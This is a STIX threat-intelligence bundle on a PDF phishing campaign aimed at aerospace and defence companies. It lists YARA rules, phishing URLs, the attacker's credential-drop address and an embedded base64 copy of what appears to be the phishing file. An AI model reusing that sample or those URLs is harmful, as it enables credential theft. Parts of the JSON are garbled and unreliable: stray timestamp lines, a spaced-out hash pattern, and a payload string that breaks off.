2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--5cdd3938-7134-4908-9552-173cc0a8016e" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"name" : "EUROLEA" ,
"identity_class" : "organization"
} ,
{
"type" : "report" ,
"spec_version" : "2.1" ,
"id" : "report--5cdd3938-7134-4908-9552-173cc0a8016e" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2021-05-24T09:55:22.000Z" ,
"modified" : "2021-05-24T09:55:22.000Z" ,
"name" : "Targeted phishing - PDF documents / phishkit" ,
"published" : "2021-05-26T10:17:36Z" ,
"object_refs" : [
"indicator--5cdd3a39-84f0-4179-b3ea-173cc0a8016e" ,
"indicator--5cdd3a5b-3448-49d1-b35e-12a4c0a8016e" ,
"indicator--5cdd5b25-5624-4404-b507-c170950d210f" ,
"indicator--5cdd5b65-9f28-4c2f-944e-444b950d210f" ,
"indicator--5cdd5b65-dcb0-49b0-bf70-4129950d210f" ,
"indicator--5cdd5b65-5d90-4cdf-ab91-4355950d210f" ,
"indicator--5cdd5b65-0804-4636-bffe-491e950d210f" ,
"indicator--5cdd5b65-b1f0-4e0f-bf15-4c53950d210f" ,
"indicator--5cdd5dcf-4a6c-4843-94b3-4d49950d210f" ,
"x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f" ,
"x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f" ,
"x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f" ,
"x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f" ,
"x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f" ,
"x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f" ,
"observed-data--5cdd6540-3188-4be6-8664-4555950d210f" ,
"url--5cdd6540-3188-4be6-8664-4555950d210f" ,
"indicator--5cdd66da-91e4-49bb-a834-409b950d210f" ,
"observed-data--5cdd6827-982c-43af-9aa9-4212950d210f" ,
"url--5cdd6827-982c-43af-9aa9-4212950d210f" ,
"x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
"indicator--97bd5034-12a0-4c06-a779-de38deac6059" ,
"indicator--3a4f2299-8136-45ec-8927-223b672e4b88" ,
"indicator--9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"indicator--06a84b03-0560-46ae-8570-1e7072a0b400" ,
"indicator--453258ef-0925-4471-9dcc-a06ab8038664" ,
"indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f" ,
"x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f" ,
"malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f" ,
"x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6" ,
"x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8" ,
"x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e" ,
"x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43" ,
"x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d" ,
"x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2" ,
"x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f" ,
2023-12-14 14:30:15 +00:00
"relationship--a1cc288d-984d-454c-bb8a-4f39eaabc9d9" ,
"relationship--9e24ff82-461d-47c8-9a8d-632538aa9dc7" ,
"relationship--75543602-135e-47b5-adeb-33617b83b44e" ,
"relationship--961af626-d91c-4abf-a0b5-96a19a591dc6" ,
"relationship--93a1b5cb-b3c4-41fe-872b-4baa08510b8f" ,
"relationship--456cb2c1-ca0b-4af8-bfd3-930e0613f289" ,
"relationship--1a96e906-2823-4077-9c49-0f488ce57dc7" ,
"relationship--6310681b-0514-46b0-b9c0-60b29c6d28e2" ,
"relationship--fb869c02-938e-4078-993e-6950c0959253" ,
"relationship--9a086825-5904-414d-b479-8205d53b8500" ,
"relationship--1133d1e2-9a31-40e6-a67e-73d1afa18ba1" ,
"relationship--278afdc4-b54f-4032-ad42-ae6ec3def777" ,
"relationship--f02bb64f-98de-49b8-80d6-8cb8adece1b7" ,
"relationship--aacf8252-c017-41e9-b04d-401371530759" ,
"relationship--54329dd6-b4f0-4a5b-aba2-487d71030419" ,
"relationship--0b158655-ad51-41fc-97c9-a4f4ed93aa85" ,
"relationship--1c74b5bd-88d2-46cc-83b5-30a6496e8870" ,
"relationship--80ff2b4f-c28a-46e2-b2f8-5bda12b221ff" ,
"relationship--417112bc-55f4-48fd-b513-8eb02da31fbc" ,
"relationship--f8b93184-313e-4a81-95fa-bdd35ca3a44a" ,
"relationship--458035d0-ef31-4f17-9344-6bd8c7f28b58" ,
"relationship--3e2416c6-eacd-49aa-85ca-7e1536e9ab30" ,
"relationship--df38c18d-288b-4f38-a75a-41cd5b6dafc4" ,
"relationship--47244ea9-e1a1-4818-b73a-92839d4eff22" ,
"relationship--d175e336-6135-4647-b29b-f801281360b4" ,
"relationship--d355ad79-2ac5-469e-99e1-948556d77f57" ,
"relationship--3258f81a-c783-4949-9818-8d2420910f0b" ,
"relationship--541a93ee-4485-4c63-b5a9-506dec849942" ,
"relationship--ebb79458-35d6-4ba4-8c6f-abf797e8d83a" ,
"relationship--8f1006c9-baa3-4c34-8910-f15fd53a3d36" ,
"relationship--35422291-d92b-4209-b8ae-9f15fc0d970f" ,
"relationship--632e5af4-77bc-4f2d-929c-11fd92709d47"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"" ,
"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"" ,
"enisa:nefarious-activity-abuse=\"spear-phishing-attacks\"" ,
"type:OSINT" ,
"osint:lifetime=\"perpetual\"" ,
"osint:certainty=\"50\""
] ,
"object_marking_refs" : [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ,
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd3a39-84f0-4179-b3ea-173cc0a8016e" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T10:23:53.000Z" ,
"modified" : "2019-05-16T10:23:53.000Z" ,
"pattern" : "[rule PDF_LIFT {\r\nstrings:\r\n\t$a = \"Rect[ 195.05 428.59 411.79 489.67]\"\r\ncondition:\r\n\tall of them\r\n}]" ,
"pattern_type" : "yara" ,
2023-12-14 14:30:15 +00:00
"pattern_version" : "2.1" ,
2023-04-21 14:44:17 +00:00
"valid_from" : "2019-05-16T10:23:53Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"yara\"" ,
"misp:category=\"Artifacts dropped\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd3a5b-3448-49d1-b35e-12a4c0a8016e" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:13:24.000Z" ,
"modified" : "2019-05-16T13:13:24.000Z" ,
"description" : "Generic yara rule to find the common JAT author." ,
"pattern" : "[rule PDF_JAT_AUTHOR {\r\nstrings:\r\n$a = \"<</Author(JAT)\"\r\ncondition:\r\nall of them\r\n}]" ,
"pattern_type" : "yara" ,
2023-12-14 14:30:15 +00:00
"pattern_version" : "2.1" ,
2023-04-21 14:44:17 +00:00
"valid_from" : "2019-05-16T13:13:24Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Artifacts dropped"
}
] ,
"labels" : [
"misp:type=\"yara\"" ,
"misp:category=\"Artifacts dropped\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b25-5624-4404-b507-c170950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:44:21.000Z" ,
"modified" : "2019-05-16T12:44:21.000Z" ,
"description" : "Email used to send credentials (found in the sendmail.php file)" ,
"pattern" : "[email-message:to_refs[*].value = 'jatboss6@gmail.com']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:44:21Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"email-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b65-9f28-4c2f-944e-444b950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:45:25.000Z" ,
"modified" : "2019-05-16T12:45:25.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://lulufabllc.com/doc/cdnrg.com/index.php']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:45:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b65-dcb0-49b0-bf70-4129950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:45:25.000Z" ,
"modified" : "2019-05-16T12:45:25.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:45:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b65-5d90-4cdf-ab91-4355950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:45:25.000Z" ,
"modified" : "2019-05-16T12:45:25.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://www.arbutusroutes.com/document/standardaero.com/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:45:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b65-0804-4636-bffe-491e950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:45:25.000Z" ,
"modified" : "2019-05-16T12:45:25.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://www.arbutusroutes.com/document/utc.com/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:45:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5b65-b1f0-4e0f-bf15-4c53950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:45:25.000Z" ,
"modified" : "2019-05-16T12:45:25.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://www.arbutusroutes.com/document/gd.com/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:45:25Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd5dcf-4a6c-4843-94b3-4d49950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T12:56:19.000Z" ,
"modified" : "2019-05-16T12:56:19.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://www.arbutusroutes.com/document/airbus.com/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T12:56:19Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "airbus.com"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "tenova.com"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "standardaero.com"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "gd.com"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "utc.com"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:21:32.000Z" ,
"modified" : "2019-05-16T13:21:32.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "cdnrg.com"
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5cdd6540-3188-4be6-8664-4555950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:27:28.000Z" ,
"modified" : "2019-05-16T13:27:28.000Z" ,
"first_observed" : "2019-05-16T13:27:28Z" ,
"last_observed" : "2019-05-16T13:27:28Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5cdd6540-3188-4be6-8664-4555950d210f"
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5cdd6540-3188-4be6-8664-4555950d210f" ,
"value" : "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5cdd66da-91e4-49bb-a834-409b950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:34:18.000Z" ,
"modified" : "2019-05-16T13:34:18.000Z" ,
"description" : "Phishing links" ,
"pattern" : "[url:value = 'https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:34:18Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5cdd6827-982c-43af-9aa9-4212950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:39:51.000Z" ,
"modified" : "2019-05-16T13:39:51.000Z" ,
"first_observed" : "2019-05-16T13:39:51Z" ,
"last_observed" : "2019-05-16T13:39:51Z" ,
"number_observed" : 1 ,
"object_refs" : [
"url--5cdd6827-982c-43af-9aa9-4212950d210f"
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\""
]
} ,
{
"type" : "url" ,
"spec_version" : "2.1" ,
"id" : "url--5cdd6827-982c-43af-9aa9-4212950d210f" ,
"value" : "https://arbutusroutes.com/ssl/akhurst.com/index.php"
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:40:11.000Z" ,
"modified" : "2019-05-16T13:40:11.000Z" ,
"labels" : [
"misp:type=\"target-org\"" ,
"misp:category=\"Targeting data\""
] ,
"x_misp_category" : "Targeting data" ,
"x_misp_type" : "target-org" ,
"x_misp_value" : "akhurst.com"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--97bd5034-12a0-4c06-a779-de38deac6059" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:10.000Z" ,
"modified" : "2019-05-16T13:29:10.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 9 a 58 b 7 f 8 b a 0 4 c 32 c 0 27126379456e444 ' A N D f i l e : h a s h e s . S H A 1 = ' b 49 d 7 b 503 f 9e1 c d 1 a 22 a 4933 f b 1 f 1 a 1e0 b 56 f 214 ' A N D f i l e : h a s h e s . S H A 256 = ' 28 f 73 a e 365 b d e 8 c 0 3 d 0 f 93 e f 73 f 71 c 0 86 a 0 26 a c 58 f 72 b 82 b b 2384 c 3 a 5 a b 42 d 0 2 ' A N D f i l e : h a s h e s . S H A 512 = ' 1717448 f 733024 f c b 9 e a 6 d 591115 f b 852 f d 59179 c 0 71939 a 3 b 1 f e 8 f f b 93985925646 f b 813 a 2 d 5828613 d 0 c 4494 f 1 f f a 3 a 0 4182569154 f e 42 f b e a 1 d 9e9 f 5 f d 27 f ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : N s x J x 6 k E I U q W B T / j U c o X x C 24 M g p p a A a 2 X F V z C C r 1 O H N w + 4 j e 6 i M l l P : N s x / M 3 T L x e r 4 M 2 s A a 2 V V p r 1 O H 9 O e 6 H l J ' A N D f i l e : n a m e = ' 28 f 73 a e 365 b d e 8 c 0 3 d 0 f 93 e f 73 f 71 c 0 86 a 0 26 a c 58 f 72 b 82 b b 2384 c 3 a 5 a b 42 d 0 2 ' A N D f i l e : s i z e = ' 293456 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J d i s E 5 C 0 w y G s 0 w E A F B 6 B A A g A B w A O W E 1 O G I 3 Z j h i Y T A 0 Y z M y Y z A y N z E y N j M 3 O T Q 1 N m U 0 N D R V V A k A A 3453 V x + O d 1 c d X g L A A E E I Q A A A A Q h A A A A T W v S E A O A o 2 a N 6 c R 7 J 3 n p 8 Y c b s W Q T l w k c j 7 d X E 14 w 3 + e 46 q m l 6 q c d x u 3 j 9 H 4 F G a h / K L G M n p n Q c 9e43 Z E / H H H y C m 4 c Q r m 9 / 98 F h e r c Q c j A a N b i R s Y 8 e O H y 0 5 q f 7 M t 8 O X s W f 6 L l v A k S J 7 g u 5 j C 11 N X z m W Y h r P F e V 0 M y 3 Y q a a K U k r / E L 6 f B K g o e x 7 I Z S F 1 Y J X f J 20 u a M N 7 i l F e F f / H / Z m b G P y / S 56 Y o h 6 O f I D A x I q d X h 3 i N X e D J f W g v 75 I q a g p J D V 14 Z A R Q 6 u c y 9 E h u f Y b y l 634 F H Q A O q 4 l a I n q v x O Q s i E d F m 1 H H d b f 2 N f 0 P D K 8 / J L z B 3 A 3 V G O 6 F c Q 7 R a 5 t S l g 3 F n T X z w B J 2 A 8 l U M c 1 n X V c p m h w Y o r S k 882 I M a / s 3 p R s M 0 78 q / O s 8 s H l N j V F t 0 B L S D N h k g F E L r 4 j t a w q 7 l / c A 1 I S / l x F a e o p B W L Z v f 0 r J z i + b B L s 8 r E k l r m 5 o e Y J + T a Z m Z V F R p C m U g 4 e M 2 f b g f i a z n D M 65 M Q T M T V r 4 b P Y O 1 U K n I i O p N g z G T u N x q o u V K 1 i t 5 b 5 N B q B A v j a Q A y I 5 o l d Y B 5 X f g y O d r q M B w Q i 5 w m z K p d 5 g f c v E 2 V a N U x v / S c G o H x H Y x 8 j 6 p D z 1 M p n o Z X d w h / F r n + i V u I c x d a f n w v E K Q x 1 j t T 7 p O Z 1 s u o j I p G c E V z Y S s H p Y r K F j Z o B y d 8 E h y Y E g / 4 b 56 Q x J a J 9 R G i I O C i 0 U b h V f H p k g S u d a a I S s O y O R X g 3 x 1e5 C r l + D q v y G Z n O A a B 8 A A l M r t R Q o 6 X 3 w 24 c K k c m U 9 M 2 k D T u G W 5 g p r i 8 V Z 8 B 6 E a 8 T W i V G E f v k A A 6 r 2 m B 4 H 3 D Q / q f I 7 e k D o h 3 / Z H V c U 3 Q x + W U P W Y b a G o i b d m g m A h u k m e 7 t p q p W o W s D 8 y E l 22 b j e A w 1 z 41 b c F k f R s M V u f G H R v d U Y 7 g F s z Q Z q 1 f h A X t 1 u W 2 v b M A J A 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
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:29:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--3a4f2299-8136-45ec-8927-223b672e4b88" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:29:10.000Z" ,
"modified" : "2019-05-16T13:29:10.000Z" ,
